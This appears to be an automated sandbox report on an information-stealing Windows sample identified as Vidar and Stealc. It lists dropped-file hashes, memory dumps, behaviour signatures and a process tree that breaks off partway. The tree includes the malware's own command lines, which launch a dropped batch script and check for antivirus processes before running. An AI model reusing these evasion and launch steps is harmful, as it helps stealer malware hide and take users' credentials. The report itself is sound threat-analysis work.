C:\Users\Admin\AppData\Local\Temp\Vintage

MD5	278bae85379affaab937d9ec59eaa46d
SHA1	badcf501ff87624a68efb1ec3340d6314cc00027
SHA256	ae74ce2e63b5570786913b7f18c8bb79cd3f89d8a944a308ab036b39d7904edc
SHA512	9bfc82782f6318d4176f7fa7adad68d44421c76c179f5777e739f837d9ba5300453fbd9a1368eccbeccc24da9d1700db81f2128fde49547ed2ca86f1824ad391

C:\Users\Admin\AppData\Local\Temp\Overnight

MD5	fb39a9bcb79f50bd7cd171f3c9325b96
SHA1	922d750974483d7ae4e40d873b1124835d6a865a
SHA256	04d5051668e69769a85b314d0c46556755dd11182c2982c5fac2792d62f152c0
SHA512	fe2ebb8412e8df722c0f8fd8682198654ad19707525f8bf2068d18104163e809621fef079f8f2cb6176e9897a764816144187c2b6214d2406e6a30e581d556d7

C:\Users\Admin\AppData\Local\Temp\Fighting

MD5	4a5d107b42961c4cc01ff0699b64629a
SHA1	6c31783eb1a0cf760515c21b2218f905f387c3cc
SHA256	04929738eb9987535c773a0ad904049369bc81fa6e36a35d3ff38e26d53cd696
SHA512	57dc197b44971214b61942b019609011c699f7f22972660e7f5d37e7e5cd2102501ae5d5f7b6e9031074cf9a730fbc8f128340dc640344996d0d34886f1e6b72

C:\Users\Admin\AppData\Local\Temp\Travelling

MD5	528985f09d3b53a80e38911b2086f45b
SHA1	8c2c8183f0883132dfe3d61a8afa5726cec9fefa
SHA256	79b144d737cbb862203146276c32deddcee0dcbe726cc877f40f0b0348a7f502
SHA512	1e661cf38f15abd8a852c01a1605eb19da137d8fb738885c72853c624066f1350cdb98205d3ed29ae286f4463dff2dca2881dddef8f7ac3ac6a9a017d8e7e842

C:\Users\Admin\AppData\Local\Temp\Flyer

MD5	9aec66d230b5a002f8e58e7c86fd5d11
SHA1	4486447e1c450f4c687ccef10433c428dd3e31d4
SHA256	0c8303cb00fe2838fbc27ffd8af0a0fc00045ce54efa40911b50f4e828edf1d6
SHA512	752119a11a7440a63602e77fa229d741078e3117b6e461b0d383a23f5059d0aef7b629eaf90abf5f2522997d0abab06e81bf258e8f823c22ce832fdb737e1fcc

C:\Users\Admin\AppData\Local\Temp\Lol

MD5	ac4c86188160adc4ea28ea1505dc18bb
SHA1	7e22e3f0d2d0aa2235b613df0413a73324dff760
SHA256	8d73e871d375f3802510b5212aba0e8ef929d62ed0396367cd3838ca7494b5b5
SHA512	a4ff143709eaddd00cd1062c940d051606039657722cc0944886a59282b8eaafed47004dcb90bf315f53acedfbdb93935fc49c2d2cf674870211854ca10b2692

C:\Users\Admin\AppData\Local\Temp\Fails

MD5	723321b7b3b33a2788e6cc0ba336c76d
SHA1	e17eb7189561d7f8b4fab76014124b780a3da4d7
SHA256	db1674bcd78442305a1a79773d17b61a6c5bbf830ce8e4983164c1f56198236a
SHA512	dd3c229f3b36cb07222663b8becac13df8d3a68874aee73ad20b11e18591085664ff9df27e9d84d9e9eedc00cc206db975049650f37d11bb666f1d690029c35e

C:\Users\Admin\AppData\Local\Temp\Impacts

MD5	315afae2384177766854966d0c39ead0
SHA1	baa183ea390760a631723c2f1494e0af8fb391e0
SHA256	229d27cf367f7844bdc9da75bcffc7c68a8b71aa1a31dd819f5ee4fe3bc42767
SHA512	384d2d0926af3ac4355461dd01e248d82b7f55a1a851d18c5ba892ba987472c13e8036e9e1a11806c8501595d19bc753290121903aa51d345af62381f6b815ab

C:\Users\Admin\AppData\Local\Temp\Worry

MD5	c715434dab2f93f0d1b6680c2b01b3fc
SHA1	355ea26f3a52b2c9abb457b9c56177a229cf9421
SHA256	05ddf26b6a74f039743ffd1d4d6152b8aa0add24da17aece71f9ccaa60538c4c
SHA512	7d39bf5a5362dd4d7ee51f4c963eb55cfdd3da46db093e288cec3db71c8b1bfaa304a64e539524fb62c397cd0a27c0890f3c93db4b591a84360bd47f23bfbc6a

C:\Users\Admin\AppData\Local\Temp\Therefore

MD5	cc32e2964f235bf9bddd71d4f7d3a9e2
SHA1	a570733cfce8d135315e86473b0ac6f6b4a4e763
SHA256	ec7c44500d11213688b83a04fb95c52b0d2c3ed2cc28d8d7e604f5b9336852f4
SHA512	3c3bea9699b4904e949c71ea40e72f39824837a9ed5251d1e1b5b857642bb2d6816c5d125255bb9272f599dd14d594fa820dacf22e8f72df424a419942e9ff8b

C:\Users\Admin\AppData\Local\Temp\Ensures

MD5	5abe66470ddba2d1adc1ea359fb58b7d
SHA1	b914707d1f1b1c16dc03470cd8737a889292796c
SHA256	fecefcaab4d2499057061a01c13c3ec834ec4fcf13188e8708ad33cc3a6c6cb8
SHA512	5f95116f3f91ce9ed5d084e2c7b9df62892a633b3f45c3b714be8c34d39258d401e189297e49e15e8f497b88c2677f089473cd60e2e4806647fb7fc83471c0e2

C:\Users\Admin\AppData\Local\Temp\Venezuela

MD5	47d9d9cdad725675c2dfa55ed4717db6
SHA1	d7bc49f9fae903accddf2da620dc5b9668f35dce
SHA256	d4be1b5210a95583cc8617ab58b5947b46abaf4f000960abcc774eee20751210
SHA512	4e12b065fc581460d137a0aebdffd3d56cfaf82b4d8be81bdfc3d4daf0897eda2230ab05166b35928b0b3c2f2cf0fb751ace6109b400d107a89797fefb5cf34e

C:\Users\Admin\AppData\Local\Temp\Noticed

MD5	90ab924a6bc6d90d922308452ce5c128
SHA1	4fd74c170817b9685b9230625fe7e47d54473829
SHA256	2ebfcd2eeaf8bc9561a1310ddc51e8759859e6523d0e8c73bb06969368ef88b2
SHA512	e93e506184d2b57abeb9601968bb0f53a06f78e8d08d3a5b5fd9f8b56a1e8709b2a48d3372e0a5d5152902a294c3b201176b35f60f7d4ee2636e15e0ca99b740

C:\Users\Admin\AppData\Local\Temp\Controversial

MD5	b8d54a8f7a866ce5950c2c67b18343ee
SHA1	95f12fbd6244ea3ecee9795ebd984a97bd056ef7
SHA256	8205f767c8dd7bb85316fe3f1988225c4bab822b39c03c412473f63f7fadddae
SHA512	1679d376069aab604f9c483623f1f7d53ca3792fa6dddb214360690186ec39662807149a7e525d797ee89d80bf742fb51a59beb0e053c4187b661bd8c954a164

C:\Users\Admin\AppData\Local\Temp\Expects

MD5	f9c59716c76e0d9aea1ed33432d0c0eb
SHA1	e017af5635025c7a5dddd5879e19f0e56cee5f63
SHA256	26deadb528299fc9567030e170fd608190da63a2cc0b8869565e4706329aee9b
SHA512	c24d790ae2ce1a66a5c9fd7eb15317cc25a2e16d28996eab7b46bea52b842ae20fcfc934edad5b70d8a0b66350db587057f346ca534e4b97fbb805693c6def61

C:\Users\Admin\AppData\Local\Temp\Banners

MD5	3f96912bd26122377de90bdf2b2adb43
SHA1	355135ae39c67bc1e8a34962db066b2d4862df22
SHA256	1025adb658535b34a6b1b162708f1d829e332bf7dfda6e389c5b676d2057b881
SHA512	6942ce7a6a09eaa4e4f897935d472d8a50cdc822d820e978eba449207ae42b65c86f5374226e4c1957ef9f8a7b3c26dfcdf45ec69edae9ce51173a0822c08174

C:\Users\Admin\AppData\Local\Temp\Tactics

MD5	2c9654e874efe5146131ed5422a715d9
SHA1	0e6d5c61f2b4821da4ecedd2a59eb6b023daa0e3
SHA256	2b35604cd27e82644be51f3266054f35b2415dd65abaa7b9b34f329fa14038e6
SHA512	bfba8ba24bc24899718d2d0b1f8948c1899c41b00624493bbd9a7c253cdee44a0f6e28d5db33473dafc3dbe6367fbdca2c062ea9cf21a15ef7ea53de8ce71c05

C:\Users\Admin\AppData\Local\Temp\Exception

MD5	2b79f9677d8663ccff67fbe4677a5065
SHA1	f63cbee04c6ae82b0f9ebaeeed8fbce7be51e7ed
SHA256	7b70774cca90f24dc9e1b889b6e277961ed7b61ed4cd8dbdd4642c65cb9b1ba9
SHA512	ce31599996e45e5aeb04b7d51e510711303471e85520986c91c4eac61a843c3d8e2b70851a1a6df0bf4b0825d417ac0b1b70822e93ab8f9523414effbef93619

C:\Users\Admin\AppData\Local\Temp\Voice

MD5	c01790f3cef20061f828578069162760
SHA1	72a450b13fd37f6c5c95d94240c51354316d5962
SHA256	328d81768d3cb94a93c1d689ed4b571753d59309f44954e83ee9d3966369325b
SHA512	4350a43ddef179c199ea55acba477b57490f2434eb45cea9b3f9ebca9f4b3615c41bc38f19570bd2a1188fecc472c5406ef2d1637b16a55deb5814ab2b785fab

C:\Users\Admin\AppData\Local\Temp\Abroad

MD5	6d4062e0f673dbe0a06ec227fe515c62
SHA1	c35c0ed445442d405ccfc78a20bbb86cf97526f6
SHA256	4e1c30452e317b04199626e8b7ca7f3b2c0c6b275715b1832533fcec030b72f4
SHA512	df953dbdb117c7ef3dbfcd266dee839f9a1ca4d50924f86d9620d0ca7a7fc9e3059caa955251e2327d46571ceb0b79dc53a2fef5b4b4f829ba33c436f982a921

\Users\Admin\AppData\Local\Temp\150746\Mind.pif

MD5	b06e67f9767e5023892d9698703ad098
SHA1	acc07666f4c1d4461d3e1c263cf6a194a8dd1544
SHA256	8498900e57a490404e7ec4d8159bee29aed5852ae88bd484141780eaadb727bb
SHA512	7972c78acebdd86c57d879c12cb407120155a24a52fda23ddb7d9e181dd59dac1eb74f327817adbc364d37c8dc704f8236f3539b4d3ee5a022814924a1616943

memory/2260-213-0x00000000009C0000-0x000000000110A000-memory.dmp

memory/2260-214-0x00000000009C0000-0x000000000110A000-memory.dmp

memory/2260-216-0x00000000009C0000-0x000000000110A000-memory.dmp

memory/2260-232-0x00000000009C0000-0x000000000110A000-memory.dmp

memory/2260-233-0x00000000009C0000-0x000000000110A000-memory.dmp

memory/2260-234-0x0000000061E00000-0x0000000061EF3000-memory.dmp

memory/2260-254-0x00000000009C0000-0x000000000110A000-memory.dmp

\ProgramData\FIIJJKKFHIEH\nss3.dll

MD5	1cc453cdf74f31e4d913ff9c10acdde2
SHA1	6e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256	ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512	dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

\ProgramData\FIIJJKKFHIEH\mozglue.dll

MD5	c8fd9be83bc728cc04beffafc2907fe9
SHA1	95ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256	ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512	fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

memory/2260-255-0x00000000009C0000-0x000000000110A000-memory.dmp

C:\ProgramData\BFCFBKKKFH.exe

MD5	6cfddd5ce9ca4bb209bd5d8c2cd80025
SHA1	424da82e9edbb6b39a979ab97d84239a1d67c48b
SHA256	376e1802b979514ba0e9c73933a8c6a09dd3f1d2a289f420c2202e64503d08a7
SHA512	d861130d87bfedc38a97019cba17724067f397e6ffe7e1384175db48c0a177a2e7e256c3c933d0f42766e8077f767d6d4dc8758200852e8ec135736daee7c0f8

C:\ProgramData\CGDBFBGIDH.exe

MD5	daaff76b0baf0a1f9cec253560c5db20
SHA1	0311cf0eeb4beddd2c69c6e97462595313a41e78
SHA256	5706c6f5421a6a34fdcb67e9c9e71283c8fc1c33499904519cbdc6a21e6b071c
SHA512	987ca2d67903c65ee1075c4a5250c85840aea26647b1d95a3e73a26dcad053bd4c31df4ca01d6cc0c196fa7e8e84ab63ed4a537f72fc0b1ee4ba09cdb549ddf3

memory/2436-314-0x0000000000400000-0x0000000000648000-memory.dmp

memory/2524-317-0x0000000000400000-0x0000000000913000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\2ff0e402

MD5	c62f812e250409fbd3c78141984270f2
SHA1	9c7c70bb78aa0de4ccf0c2b5d87b37c8a40bd806
SHA256	d8617477c800cc10f9b52e90b885117a27266831fb5033647b6b6bd6025380a8
SHA512	7573ecac1725f395bbb1661f743d8ee6b029f357d3ef07d0d96ee4ff3548fe06fab105ee72be3e3964d2053de2f44245cca9a061d47c1411949840c84f6e9092

memory/2436-324-0x00000000771D0000-0x0000000077379000-memory.dmp

memory/2436-323-0x00000000733A0000-0x0000000073514000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5	dd597d700b3140ad8a12b6e540d68b00
SHA1	3238ba152e090def3116743db47133479351517a
SHA256	652798909e2a1d1b792a09cbb112d3fefd8b1fa2479082c89669e48a309f3970
SHA512	c0f100f86f53ab3d60e95b47658bb81f057be3a89c6d212d0f903078f720d07063d5bd8a03da36fcc989fbc30543e435ae5cd0943588a6f03ff3c95f986290e8

C:\Users\Admin\AppData\Local\Temp\Cab25F8.tmp

MD5	ac05d27423a85adc1622c714f2cb6184
SHA1	b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256	c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA512	6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5	49aebf8cbd62d92ac215b2923fb1b9f5
SHA1	1723be06719828dda65ad804298d0431f6aff976
SHA256	b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512	bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\Tar27F2.tmp

MD5	4ea6026cf93ec6338144661bf1202cd1
SHA1	a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256	8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512	6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

C:\Users\Admin\AppData\Local\Temp\3cf5cb4b

MD5	8d443e7cb87cacf0f589ce55599e008f
SHA1	c7ff0475a3978271e0a8417ac4a826089c083772
SHA256	e2aaaa1a0431aab1616e2b612e9b68448107e6ce71333f9c0ec1763023b72b2a
SHA512	c7d0ced6eb9e203d481d1dbdd5965278620c10cdc81c02da9c4f7f99f3f8c61dfe975cf48d4b93ccde9857edb881a77ebe9cd13ae7ef029285d770d767aa74a5

memory/2524-371-0x00000000733A0000-0x0000000073514000-memory.dmp

memory/2524-372-0x00000000771D0000-0x0000000077379000-memory.dmp

memory/2260-376-0x00000000009C0000-0x000000000110A000-memory.dmp

memory/2260-377-0x00000000009C0000-0x000000000110A000-memory.dmp

memory/2260-381-0x00000000009C0000-0x000000000110A000-memory.dmp

memory/2260-382-0x00000000009C0000-0x000000000110A000-memory.dmp

memory/2260-386-0x00000000009C0000-0x000000000110A000-memory.dmp

memory/2260-387-0x00000000009C0000-0x000000000110A000-memory.dmp

memory/2436-397-0x00000000733A0000-0x0000000073514000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\34f40353

MD5	9f374df6ab1a6d0281ecc165e17648ef
SHA1	1083e65674523ab353335f7fb8eb41534f8f9525
SHA256	ae5cdcfb5f66cebb05bc3c40d90d6999ac75bf895db4a339acebc130ca76afbe
SHA512	858704e3efccea99c3b8f556b29ce12dcc97b462d8b591ce62b01019c9c88bc8e0305436b300dcd3869e67acc19df9063b0256e27ee30a2e7ac24dc4c38c87bd

memory/2524-400-0x00000000733A0000-0x0000000073514000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\40c7ec8c

MD5	03b48ef6a145309945bef7cd76e37f2a
SHA1	181cb09c2d09f810a65c836d9ecf01ae48886d56
SHA256	fcbfee01f0c8efcb7590fcca43c986dee92d54b8ec87c4550632df032ab76d02
SHA512	3a4d94c7428833e7c09e1123e0f2900669cbf286ddfde75dea2aff6481504808fa6370c43aae6a3b8841e2463e31d35b01609f2acf76be060926f312dea8c9f7

memory/2308-403-0x00000000771D0000-0x0000000077379000-memory.dmp

memory/2464-404-0x00000000771D0000-0x0000000077379000-memory.dmp

C:\ProgramData\FIIJJKKFHIEH\msvcp140.dll

MD5	5ff1fca37c466d6723ec67be93b51442
SHA1	34cc4e158092083b13d67d6d2bc9e57b798a303b
SHA256	5136a49a682ac8d7f1ce71b211de8688fce42ed57210af087a8e2dbc8a934062
SHA512	4802ef62630c521d83a1d333969593fb00c9b38f82b4d07f70fbd21f495fea9b3f67676064573d2c71c42bc6f701992989742213501b16087bb6110e337c7546

C:\ProgramData\FIIJJKKFHIEH\softokn3.dll

MD5	4e52d739c324db8225bd9ab2695f262f
SHA1	71c3da43dc5a0d2a1941e874a6d015a071783889
SHA256	74ebbac956e519e16923abdc5ab8912098a4f64e38ddcb2eae23969f306afe5a
SHA512	2d4168a69082a9192b9248f7331bd806c260478ff817567df54f997d7c3c7d640776131355401e4bdb9744e246c36d658cb24b18de67d8f23f10066e5fe445f6

C:\ProgramData\FIIJJKKFHIEH\VCRUNT~1.DLL

MD5	a37ee36b536409056a86f50e67777dd7
SHA1	1cafa159292aa736fc595fc04e16325b27cd6750
SHA256	8934aaeb65b6e6d253dfe72dea5d65856bd871e989d5d3a2a35edfe867bb4825
SHA512	3a7c260646315cf8c01f44b2ec60974017496bd0d80dd055c7e43b707cadba2d63aab5e0efd435670aa77886ed86368390d42c4017fc433c3c4b9d1c47d0f356

memory/2308-410-0x00000000733A0000-0x0000000073514000-memory.dmp

memory/2308-420-0x00000000733A0000-0x0000000073514000-memory.dmp

memory/2140-424-0x00000000771D0000-0x0000000077379000-memory.dmp

memory/2140-425-0x0000000000400000-0x0000000000471000-memory.dmp

memory/2140-427-0x0000000000400000-0x0000000000471000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-14 12:36

Reported

2024-06-14 12:40

Platform

win10v2004-20240508-en

Max time kernel

67s

Max time network

68s

Command Line

C:\Windows\Explorer.EXE

Signatures

Detect Vidar Stealer

stealer

Description	Indicator	Process	Target
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A

Stealc

stealer stealc

Suspicious use of NtCreateUserProcessOtherParentProcess

Description	Indicator	Process	Target
PID 1032 created 3368	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	C:\Windows\Explorer.EXE
PID 1032 created 3368	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	C:\Windows\Explorer.EXE

Vidar

stealer vidar

Checks computer location settings

Description	Indicator	Process	Target
Key value queried	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation	C:\Users\Admin\AppData\Local\Temp\Setup (10).exe	N/A
Key value queried	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	N/A

Executes dropped EXE

Description	Indicator	Process	Target
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	N/A

Reads data files stored by FTP clients

spyware stealer

Checks installed software on the system

discovery

Suspicious use of SetThreadContext

Description	Indicator	Process	Target
PID 1032 set thread context of 2632	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif

Enumerates physical storage devices

Checks processor information in registry

Description	Indicator	Process	Target
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	N/A

Delays execution with timeout.exe

evasion

Description	Indicator	Process	Target
N/A	N/A	C:\Windows\SysWOW64\timeout.exe	N/A
N/A	N/A	C:\Windows\SysWOW64\timeout.exe	N/A

Enumerates processes with tasklist

Description	Indicator	Process	Target
N/A	N/A	C:\Windows\SysWOW64\tasklist.exe	N/A
N/A	N/A	C:\Windows\SysWOW64\tasklist.exe	N/A

Suspicious behavior: EnumeratesProcesses

Description	Indicator	Process	Target
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	N/A

Suspicious use of AdjustPrivilegeToken

Description	Indicator	Process	Target
Token: SeDebugPrivilege	N/A	C:\Windows\SysWOW64\tasklist.exe	N/A
Token: SeDebugPrivilege	N/A	C:\Windows\SysWOW64\tasklist.exe	N/A

Suspicious use of FindShellTrayWindow

Description	Indicator	Process	Target
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	N/A

Suspicious use of SendNotifyMessage

Description	Indicator	Process	Target
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	N/A

Suspicious use of WriteProcessMemory

Description	Indicator	Process	Target
PID 4760 wrote to memory of 3400	N/A	C:\Users\Admin\AppData\Local\Temp\Setup (10).exe	C:\Windows\SysWOW64\cmd.exe
PID 4760 wrote to memory of 3400	N/A	C:\Users\Admin\AppData\Local\Temp\Setup (10).exe	C:\Windows\SysWOW64\cmd.exe
PID 4760 wrote to memory of 3400	N/A	C:\Users\Admin\AppData\Local\Temp\Setup (10).exe	C:\Windows\SysWOW64\cmd.exe
PID 3400 wrote to memory of 2520	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Windows\SysWOW64\tasklist.exe
PID 3400 wrote to memory of 2520	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Windows\SysWOW64\tasklist.exe
PID 3400 wrote to memory of 2520	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Windows\SysWOW64\tasklist.exe
PID 3400 wrote to memory of 3248	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Windows\SysWOW64\findstr.exe
PID 3400 wrote to memory of 3248	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Windows\SysWOW64\findstr.exe
PID 3400 wrote to memory of 3248	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Windows\SysWOW64\findstr.exe
PID 3400 wrote to memory of 4220	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Windows\SysWOW64\tasklist.exe
PID 3400 wrote to memory of 4220	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Windows\SysWOW64\tasklist.exe
PID 3400 wrote to memory of 4220	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Windows\SysWOW64\tasklist.exe
PID 3400 wrote to memory of 2516	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Windows\SysWOW64\findstr.exe
PID 3400 wrote to memory of 2516	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Windows\SysWOW64\findstr.exe
PID 3400 wrote to memory of 2516	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Windows\SysWOW64\findstr.exe
PID 3400 wrote to memory of 1132	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Windows\SysWOW64\cmd.exe
PID 3400 wrote to memory of 1132	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Windows\SysWOW64\cmd.exe
PID 3400 wrote to memory of 1132	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Windows\SysWOW64\cmd.exe
PID 3400 wrote to memory of 1096	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Windows\SysWOW64\findstr.exe
PID 3400 wrote to memory of 1096	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Windows\SysWOW64\findstr.exe
PID 3400 wrote to memory of 1096	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Windows\SysWOW64\findstr.exe
PID 3400 wrote to memory of 2384	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Windows\SysWOW64\cmd.exe
PID 3400 wrote to memory of 2384	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Windows\SysWOW64\cmd.exe
PID 3400 wrote to memory of 2384	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Windows\SysWOW64\cmd.exe
PID 3400 wrote to memory of 1032	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif
PID 3400 wrote to memory of 1032	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif
PID 3400 wrote to memory of 1032	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif
PID 3400 wrote to memory of 1760	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Windows\SysWOW64\timeout.exe
PID 3400 wrote to memory of 1760	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Windows\SysWOW64\timeout.exe
PID 3400 wrote to memory of 1760	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Windows\SysWOW64\timeout.exe
PID 1032 wrote to memory of 2860	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif
PID 1032 wrote to memory of 2860	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif
PID 1032 wrote to memory of 2860	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif
PID 1032 wrote to memory of 2632	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif
PID 1032 wrote to memory of 2632	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif
PID 1032 wrote to memory of 2632	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif
PID 1032 wrote to memory of 2632	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif
PID 1032 wrote to memory of 2632	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif
PID 2632 wrote to memory of 4280	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	C:\Windows\SysWOW64\cmd.exe
PID 2632 wrote to memory of 4280	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	C:\Windows\SysWOW64\cmd.exe
PID 2632 wrote to memory of 4280	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	C:\Windows\SysWOW64\cmd.exe
PID 4280 wrote to memory of 808	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Windows\SysWOW64\timeout.exe
PID 4280 wrote to memory of 808	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Windows\SysWOW64\timeout.exe
PID 4280 wrote to memory of 808	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Windows\SysWOW64\timeout.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\Setup (10).exe

"C:\Users\Admin\AppData\Local\Temp\Setup (10).exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k copy Secretariat Secretariat.cmd & Secretariat.cmd & exit

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "wrsa.exe opssvc.exe"

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

